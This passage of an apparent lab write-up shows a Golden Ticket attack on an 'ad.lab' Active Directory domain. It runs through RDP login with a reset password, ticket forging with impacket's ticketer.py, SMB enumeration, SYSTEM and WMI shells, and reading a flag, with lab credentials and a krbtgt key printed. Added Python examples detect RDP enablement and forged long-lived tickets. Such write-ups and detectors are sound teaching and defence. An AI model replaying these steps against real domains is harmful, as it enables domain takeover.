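    window and password resets by the same account are pulled in as context
    so the analyst sees the whole sequence rather than three separate events.
    """
    events = sorted(records, key=lambda r: r["TimeCreated"])
    alerts = []
    for e in events:
        if classify(e) != "rdp-enabled-in-registry":
            continue
        start, subject = e["TimeCreated"], e["SubjectUserName"]
        actions = ["rdp-enabled-in-registry"]
        for other in events:
            if other is e:
                continue
            delta = other["TimeCreated"] - start
            if delta < timedelta(0) or delta > window:
                continue
            action = classify(other)
            if action is None:
                continue
            # 4946 has no Subject fields, so it is matched on timing alone;
            # everything else must come from the same account.
            if other["EventID"] == 4946 or other.get("SubjectUserName") == subject:
                actions.append(action)
        alerts.append({"subject": subject, "start": start, "actions": actions})
    return alerts


# Constructed records (not real logs) modelled on steps 6 to 9 above, plus a
# helpdesk reset in the same window that belongs to a different account.
T0 = datetime(2025, 2, 8, 23, 40, 0)
SAMPLE_EVENTS = [
    {"EventID": 4657, "TimeCreated": T0, "SubjectUserName": "Administrator",
     "ObjectName": TS_KEY, "ObjectValueName": "fDenyTSConnections",
     "OldValue": "1", "NewValue": "0"},
    {"EventID": 4946, "TimeCreated": T0 + timedelta(minutes=1),
     "RuleName": "Allow RDP Inbound"},
    {"EventID": 4724, "TimeCreated": T0 + timedelta(minutes=2),
     "SubjectUserName": "helpdesk01", "TargetUserName": "someuser"},
    {"EventID": 4724, "TimeCreated": T0 + timedelta(minutes=3),
     "SubjectUserName": "Administrator", "TargetUserName": "Jamie"},
]

if __name__ == "__main__":
    for a in correlate_rdp_enablement(SAMPLE_EVENTS):
        print(f"[!] {a['subject']} at {a['start']}: {' -> '.join(a['actions'])}")
```

Note that the firewall rule alone is weak evidence (administrators add rules all day); it is the registry flip on a domain controller that should not have RDP enabled that anchors the alert, with the rest as supporting detail.
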

10. Connected to the Domain Controller via RDP as a Domain Admin (Jamie)

┌──(kali㉿kali)-[~]
└─$ xfreerdp3 /cert:ignore /compression /auto-reconnect /u:Jamie /p:NewPassword123 /v:10.10.14.1
[23:51:18:013] [210738:210739] [INFO][com.freerdp.gdi] - Local framebuffer format  PIXEL_FORMAT_BGRX32
[23:51:18:013] [210738:210739] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_BGRA32
[23:51:18:049] [210738:210739] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd
[23:51:18:049] [210738:210739] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel rdpgfx
[23:51:18:330] [210738:210739] [INFO][com.freerdp.client.x11] - Logon Error Info LOGON_FAILED_OTHER [LOGON_MSG_SESSION_CONTINUE]
[23:51:20:695] [210738:210739] [WARN][com.freerdp.core.rdp] - pduType PDU_TYPE_DATA not properly parsed, 562 bytes remaining unhandled. Skipping.

FILES01 Attacks

1. Purged the existing Kerberos ticket cache

┌──(kali㉿kali)-[~]
└─$ kdestroy

2. Copied ticketer.py to the current working directory

┌──(kali㉿kali)-[~]
└─$ locate ticketer.py
/usr/lib/python3/dist-packages/scapy/modules/ticketer.py
/usr/share/doc/python3-impacket/examples/ticketer.py

┌──(kali㉿kali)-[~]
└─$ cp /usr/share/doc/python3-impacket/examples/ticketer.py .

3. Used the AES Key for the Kerberos Ticket Granting Ticket (TGT) account to create a Golden Ticket for the ad.lab Domain:

┌──(kali㉿kali)-[~]
└─$ ./ticketer.py -aesKey c87ee26d98cd7e5619ee2f4f112825d2f2eaf820f6f7207ccb7580f26f525bf3 -domain-sid S-1-5-21-3014030118-327537043-3250143841 -domain ad.lab Administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Creating basic skeleton ticket and PAC Infos
/home/kali/./ticketer.py:141: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  aTime = timegm(datetime.datetime.utcnow().timetuple())
[*] Customizing ticket for ad.lab/Administrator
/home/kali/./ticketer.py:600: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  ticketDuration = datetime.datetime.utcnow() + datetime.timedelta(hours=int(self.__options.duration))
/home/kali/./ticketer.py:718: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  encTicketPart['authtime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
/home/kali/./ticketer.py:719: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  encTicketPart['starttime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
/home/kali/./ticketer.py:843: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  encRepPart['last-req'][0]['lr-value'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
[*]     EncAsRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncASRepPart
[*] Saving ticket in Administrator.ccache

4. Set the Kerberos Cache Environmental Variable.

┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=Administrator.ccache

5. Verified the Kerberos Ticket Cache

┌──(kali㉿kali)-[~]
└─$ klist
Ticket cache: FILE:Administrator.ccache
Default principal: Administrator@AD.LAB

Valid starting       Expires              Service principal
02/08/2025 23:53:40  02/06/2035 23:53:40  krbtgt/AD.LAB@AD.LAB
        renew until 02/06/2035 23:53:40
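
Compare this cache with the one in DC01 Attacks step 4: the KDC-issued TGT lives ten hours and renews for a day, while the forged one is valid for ten years. The KDC clamps every ticket it issues to the domain's Kerberos policy, so a TGT that outlives the policy cannot have come from the KDC, whatever principal it names. The check below is an added example, not part of this write-up. It parses the two klist dumps shown on this page and assumes the Active Directory default policy values (10 hours maximum user ticket lifetime, 7 days maximum renewal) and the MIT klist column layout as printed on Kali.

```python
import re
from datetime import datetime, timedelta

# Default Active Directory Kerberos policy ("Maximum lifetime for user ticket"
# and "Maximum lifetime for user ticket renewal"); assumed for ad.lab.
MAX_TICKET_AGE = timedelta(hours=10)
MAX_RENEW_AGE = timedelta(days=7)

# MIT klist layout as printed on Kali, e.g.
# "02/08/2025 23:28:37  02/09/2025 09:28:37  krbtgt/AD.LAB@AD.LAB"
TICKET_RE = re.compile(
    r"^(\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2})\s+"
    r"(\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2})\s+(\S+)$"
)
RENEW_RE = re.compile(r"^\s*renew until (\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2})$")
TIME_FMT = "%m/%d/%Y %H:%M:%S"


def parse_klist(text):
    """Return the tickets in a klist dump as dicts with parsed datetimes."""
    principal = None
    tickets = []
    for line in text.splitlines():
        if line.startswith("Default principal:"):
            principal = line.split(":", 1)[1].strip()
            continue
        m = TICKET_RE.match(line)
        if m:
            tickets.append({
                "principal": principal,
                "service": m.group(3),
                "start": datetime.strptime(m.group(1), TIME_FMT),
                "expires": datetime.strptime(m.group(2), TIME_FMT),
                "renew_until": None,
            })
            continue
        m = RENEW_RE.match(line)
        if m and tickets:
            tickets[-1]["renew_until"] = datetime.strptime(m.group(1), TIME_FMT)
    return tickets


def suspicious_tgts(text, max_age=MAX_TICKET_AGE, max_renew=MAX_RENEW_AGE):
    """Return the TGTs (krbtgt/ service) whose lifetime or renew window exceeds policy.

    The KDC never issues a ticket longer than policy allows, so anything over
    the limit was minted elsewhere, which is the give-away of a forged ticket.
    """
    flagged = []
    for t in parse_klist(text):
        if not t["service"].startswith("krbtgt/"):
            continue
        lifetime = t["expires"] - t["start"]
        renew = (t["renew_until"] - t["start"]) if t["renew_until"] else timedelta(0)
        if lifetime > max_age or renew > max_renew:
            flagged.append({
                "principal": t["principal"],
                "lifetime_days": lifetime.days,
                "renewable_days": renew.days,
            })
    return flagged


# Both dumps are the klist outputs shown in this write-up: the KDC-issued TGT
# from DC01 Attacks step 4 and the forged one from FILES01 Attacks step 5.
KDC_ISSUED = """\
Ticket cache: FILE:administrator.ccache
Default principal: administrator@AD.LAB

Valid starting       Expires              Service principal
02/08/2025 23:28:37  02/09/2025 09:28:37  krbtgt/AD.LAB@AD.LAB
        renew until 02/09/2025 23:28:39
"""

FORGED = """\
Ticket cache: FILE:Administrator.ccache
Default principal: Administrator@AD.LAB

Valid starting       Expires              Service principal
02/08/2025 23:53:40  02/06/2035 23:53:40  krbtgt/AD.LAB@AD.LAB
        renew until 02/06/2035 23:53:40
"""

if __name__ == "__main__":
    for label, dump in (("KDC-issued", KDC_ISSUED), ("forged", FORGED)):
        print(label, suspicious_tgts(dump) or "within policy")
```

The same lifetime check applies on the server side: a TGS request carrying a TGT whose end time is beyond what the domain policy could have produced is worth an alert on the DC, independently of any signature validation.
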

6. Used the Cached Kerberos Ticket to Enumerate SMB Shares:

┌──(kali㉿kali)-[~]
└─$ nxc smb files01.ad.lab --use-kcache --shares --kdcHost dc01.ad.lab
SMB         files01.ad.lab  445    FILES01          [*] Windows 10.0 Build 26100 x64 (name:FILES01) (domain:AD.LAB) (signing:True) (SMBv1:False)
SMB         files01.ad.lab  445    FILES01          [+] AD.LAB\administrator from ccache (Pwn3d!)
SMB         files01.ad.lab  445    FILES01          [*] Enumerated shares
SMB         files01.ad.lab  445    FILES01          Share           Permissions     Remark
SMB         files01.ad.lab  445    FILES01          -----           -----------     ------
SMB         files01.ad.lab  445    FILES01          ADMIN$          READ,WRITE      Remote Admin
SMB         files01.ad.lab  445    FILES01          C$              READ,WRITE      Default share
SMB         files01.ad.lab  445    FILES01          DomainAdminsShare READ
SMB         files01.ad.lab  445    FILES01          IPC$            READ            Remote IPC

7. Opened a semi-interactive remote SMB Exec command shell as SYSTEM on FILES01.

┌──(kali㉿kali)-[~]
└─$ impacket-smbexec -k -no-pass -dc-ip 10.10.14.1 -target-ip 10.10.14.200 files01.ad.lab
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\System32> whoami
nt authority\system

8. Configured the WMI service (winmgmt) to start automatically on the remote system.

C:\Windows\System32> sc config winmgmt start= auto
[SC] ChangeServiceConfig SUCCESS

9. Attempted to start the WMI service.

C:\Windows\System32> net start winmgmt
The requested service has already been started.

More help is available by typing NET HELPMSG 2182.

10. Enabled WMI in the Windows Firewall Rules.

C:\Windows\System32> netsh advfirewall firewall set rule group="Windows Management Instrumentation (WMI)" new enable=yes

Updated 8 rule(s).
Ok.

11. Exited the SMBEXEC remote shell session

C:\Windows\System32> exit

12. Launched a WMI command shell and confirmed membership in the Domain Admins group

┌──(kali㉿kali)-[~]
└─$ impacket-wmiexec -k -no-pass -dc-ip 10.10.14.1 -target-ip 10.10.14.200 files01.ad.lab
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\> whoami
ad.lab\administrator

C:\> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                Type             SID                                          Attributes
========================================= ================ ============================================ ===============================================================
Everyone                                  Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                             Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                    Alias            S-1-5-32-544                                 Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK                      Well-known group S-1-5-2                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users          Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization            Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group
AD\Domain Admins                          Group            S-1-5-21-3014030118-327537043-3250143841-512 Mandatory group, Enabled by default, Enabled group
AD\Group Policy Creator Owners            Group            S-1-5-21-3014030118-327537043-3250143841-520 Mandatory group, Enabled by default, Enabled group
AD\Schema Admins                          Group            S-1-5-21-3014030118-327537043-3250143841-518 Mandatory group, Enabled by default, Enabled group
AD\Enterprise Admins                      Group            S-1-5-21-3014030118-327537043-3250143841-519 Mandatory group, Enabled by default, Enabled group
AD\Denied RODC Password Replication Group Alias            S-1-5-21-3014030118-327537043-3250143841-572 Mandatory group, Enabled by default, Enabled group, Local Group
Mandatory Label\High Mandatory Level      Label            S-1-16-12288

13. Read the flag.txt file

C:\> type C:\DomainAdminsShare\flag.txt
H@6K3RS3C101TheKing!@#$

© 2025 Andrew Lobenstein. All Rights Reserved.